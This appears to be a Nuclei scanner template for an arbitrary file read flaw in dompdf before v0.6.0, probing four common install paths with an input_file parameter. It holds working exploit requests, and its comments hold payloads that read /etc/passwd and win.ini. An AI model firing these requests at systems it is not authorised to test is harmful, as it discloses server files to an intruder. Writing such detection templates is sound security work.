id: arbitrary-file-read-in-dompdf

info:
  name: Arbitrary file read in dompdf < v0.6.0
  author: 0x_Akoko
  severity: high
  reference: https://www.exploit-db.com/exploits/33004
  tags: dompdf,lfi

# - "/dompdf.php?input_file=C:/windows/win.ini"
# - "/dompdf.php?input_file=/etc/passwd"

requests:
  - method: GET
    path:
      - "{{BaseURL}}/dompdf.php?input_file=dompdf.php"
      - "{{BaseURL}}/PhpSpreadsheet/Writer/PDF/DomPDF.php?input_file=dompdf.php"
      - "{{BaseURL}}/lib/dompdf/dompdf.php?input_file=dompdf.php"
      - "{{BaseURL}}/includes/dompdf/dompdf.php?input_file=dompdf.php"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "application/pdf"
          - 'filename="dompdf_out.pdf"'
        part: header
        condition: and

      - type: status
        status:
          - 200